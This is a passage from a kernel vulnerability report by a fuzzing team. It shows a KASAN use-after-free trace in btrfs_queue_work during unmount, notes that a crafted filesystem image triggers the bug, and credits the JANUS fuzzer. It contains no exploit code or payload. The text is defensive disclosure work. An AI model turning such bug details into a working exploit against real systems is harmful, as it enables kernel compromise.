[  272.825171]  ? btrfs_queue_work+0x2c1/0x390
[  272.825171]  ? kasan_cache_shutdown+0x20/0x20
[  272.825171]  ? btrfs_queue_work+0x2c1/0x390
[  272.825171]  btrfs_queue_work+0x2c1/0x390
[  272.825171]  ? __kasan_kmalloc+0xd5/0xf0
[  272.825171]  btrfs_wq_submit_bio+0x1cd/0x240
[  272.825171]  btree_submit_bio_hook+0x18c/0x2a0
[  272.825171]  ? btree_csum_one_bio.isra.42+0x300/0x300
[  272.825171]  ? btrfs_wq_submit_bio+0x240/0x240
[  272.825171]  submit_one_bio+0x1be/0x320
[  272.825171]  flush_write_bio.isra.41+0x2c/0x70
[  272.825171]  btree_write_cache_pages+0x3bb/0x7f0
[  272.825171]  ? write_one_eb+0x680/0x680
[  272.825171]  ? set_next_entity+0x388/0x1d50
[  272.825171]  ? __switch_to_asm+0x41/0x70
[  272.825171]  ? __switch_to_asm+0x35/0x70
[  272.825171]  ? __switch_to_asm+0x42/0x70
[  272.825171]  ? __switch_to_asm+0x35/0x70
[  272.825171]  ? __switch_to_asm+0x41/0x70
[  272.825171]  ? __switch_to_asm+0x35/0x70
[  272.825171]  ? __switch_to_asm+0x41/0x70
[  272.825171]  ? __switch_to_asm+0x35/0x70
[  272.825171]  ? syscall_return_via_sysret+0xf/0x7f
[  272.825171]  ? __switch_to_asm+0x41/0x70
[  272.825171]  ? __switch_to_asm+0x35/0x70
[  272.825171]  ? __switch_to_asm+0x41/0x70
[  272.825171]  ? __switch_to_asm+0x35/0x70
[  272.825171]  ? __switch_to_asm+0x41/0x70
[  272.825171]  ? __switch_to_asm+0x35/0x70
[  272.825171]  ? __switch_to_asm+0x41/0x70
[  272.825171]  ? compat_start_thread+0x70/0x70
[  272.825171]  ? __switch_to_asm+0x41/0x70
[  272.825171]  ? __switch_to_asm+0x35/0x70
[  272.825171]  ? __switch_to_asm+0x41/0x70
[  272.825171]  ? finish_task_switch+0x17f/0x590
[  272.825171]  ? __switch_to_asm+0x41/0x70
[  272.825171]  ? __switch_to_asm+0x35/0x70
[  272.825171]  do_writepages+0x5c/0x130
[  272.825171]  __writeback_single_inode+0xa3/0x9a0
[  272.825171]  writeback_single_inode+0x23d/0x390
[  272.825171]  write_inode_now+0x1b5/0x280
[  272.825171]  ? sync_inode_metadata+0xd0/0xd0
[  272.825171]  iput+0x2ef/0x600
[  272.825171]  close_ctree+0x341/0x750
[  272.825171]  ? transaction_kthread+0x400/0x400
[  272.825171]  ? dispose_list+0x180/0x180
[  272.825171]  ? dput+0x29c/0x3c0
[  272.825171]  generic_shutdown_super+0x126/0x370
[  272.825171]  kill_anon_super+0x31/0x50
[  272.825171]  btrfs_kill_super+0x36/0x2b0
[  272.825171]  deactivate_locked_super+0x80/0xc0
[  272.825171]  deactivate_super+0x13c/0x150
[  272.825171]  ? super_setup_bdi+0xa0/0xa0
[  272.825171]  cleanup_mnt+0x9a/0x130
[  272.825171]  task_work_run+0x11a/0x1b0
[  272.825171]  exit_to_usermode_loop+0x107/0x130
[  272.825171]  do_syscall_64+0x1e5/0x280
[  272.825171]  ? page_fault+0x8/0x30
[  272.825171]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  272.825171] RIP: 0033:0x7f4d61200d77
[  272.825171] Code: 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 31 f6 e9 09 00 00 00 66 0f1f 84 00 00 00 00 00 b8 a6 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d f1 00 2b 00 f7 d8 64 89 01 48
[  272.825171] RSP: 002b:00007ffc2b474258 EFLAGS: 00000246 ORIG_RAX: 00000000000000a6
[  272.825171] RAX: 0000000000000000 RBX: 0000560b26f40080 RCX: 00007f4d61200d77
[  272.825171] RDX: 0000000000000001 RSI: 0000000000000000 RDI: 0000560b26f44940
[  272.825171] RBP: 0000560b26f44940 R08: 0000560b26f43e10 R09: 0000000000000015
[  272.825171] R10: 00000000000006b4 R11: 0000000000000246 R12: 00007f4d61702e64
[  272.825171] R13: 0000000000000000 R14: 0000560b26f40260 R15: 00007ffc2b4744e0
[  272.825171]
[  272.825171] Allocated by task 1889:
[  272.825171]  __kasan_kmalloc+0xd5/0xf0
[  272.825171]  btrfs_alloc_workqueue+0x54/0x280
[  272.825171]  open_ctree+0x2c30/0x7065
[  272.825171]  btrfs_mount_root+0xc94/0x1060
[  272.825171]  mount_fs+0xd0/0x320
[  272.825171]  vfs_kern_mount+0x5f/0x310
[  272.825171]  btrfs_mount+0x206/0x1185
[  272.825171]  mount_fs+0xd0/0x320
[  272.825171]  vfs_kern_mount+0x5f/0x310
[  272.825171]  do_mount+0x35b/0x2720
[  272.825171]  ksys_mount+0x79/0xc0
[  272.825171]  __x64_sys_mount+0xb5/0x150
[  272.825171]  do_syscall_64+0x8c/0x280
[  272.825171]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  272.825171]
[  272.825171] Freed by task 1922:
[  272.825171]  __kasan_slab_free+0x132/0x180
[  272.825171]  kfree+0x99/0x1c0
[  272.825171]  btrfs_stop_all_workers+0x8e/0x3e0
[  272.825171]  close_ctree+0x300/0x750
[  272.825171]  generic_shutdown_super+0x126/0x370
[  272.825171]  kill_anon_super+0x31/0x50
[  272.825171]  btrfs_kill_super+0x36/0x2b0
[  272.825171]  deactivate_locked_super+0x80/0xc0
[  272.825171]  deactivate_super+0x13c/0x150
[  272.825171]  cleanup_mnt+0x9a/0x130
[  272.825171]  task_work_run+0x11a/0x1b0
[  272.825171]  exit_to_usermode_loop+0x107/0x130
[  272.825171]  do_syscall_64+0x1e5/0x280
[  272.825171]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  272.825171]
[  272.825171] The buggy address belongs to the object at ffff888067cf6840
[  272.825171]  which belongs to the cache kmalloc-16 of size 16
[  272.825171] The buggy address is located 8 bytes inside of
[  272.825171]  16-byte region [ffff888067cf6840, ffff888067cf6850)
[  272.825171] The buggy address belongs to the page:
[  272.825171] page:ffffea00019f3d80 count:1 mapcount:0 mapping:ffff88806cc01b40 index:0xffff888067cf6c40
[  272.825171] flags: 0x100000000000200(slab)
[  272.825171] raw: 0100000000000200 ffffea00019f3ac0 0000001100000011 ffff88806cc01b40
[  272.825171] raw: ffff888067cf6c40 0000000080800072 00000001ffffffff 0000000000000000
[  272.825171] page dumped because: kasan: bad access detected
[  272.825171]
[  272.825171] Memory state around the buggy address:
[  272.825171]  ffff888067cf6700: fb fb fc fc fb fb fc fc fb fb fc fc fb fb fc fc
[  272.825171]  ffff888067cf6780: fb fb fc fc fb fb fc fc fb fb fc fc fb fb fc fc
[  272.825171] >ffff888067cf6800: fb fb fc fc 00 00 fc fc fb fb fc fc fb fb fc fc
[  272.825171]                                               ^
[  272.825171]  ffff888067cf6880: fb fb fc fc 00 00 fc fc 00 00 fc fc 00 00 fc fc
[  272.825171]  ffff888067cf6900: 00 00 fc fc 00 00 fc fc 00 00 fc fc 00 00 fc fc
[  272.825171] ==================================================================
[  272.825171] Disabling lock debugging due to kernel taint

Conclusion

Unmounting after some operations (with a crafted image) can cause a use-after-free in the btrfs_queue_work function.

It can be used in a malicious way.

Discoverer

Team bobfuzzer

Acknowledgments

This project used a ported version (to the 5.0.21 and 5.3.14 Linux kernels) of the filesystem fuzzer 'JANUS', which was developed by the Georgia Tech Systems Software & Security Lab (SSLab).

Thank you for the excellent fuzzer and paper below.
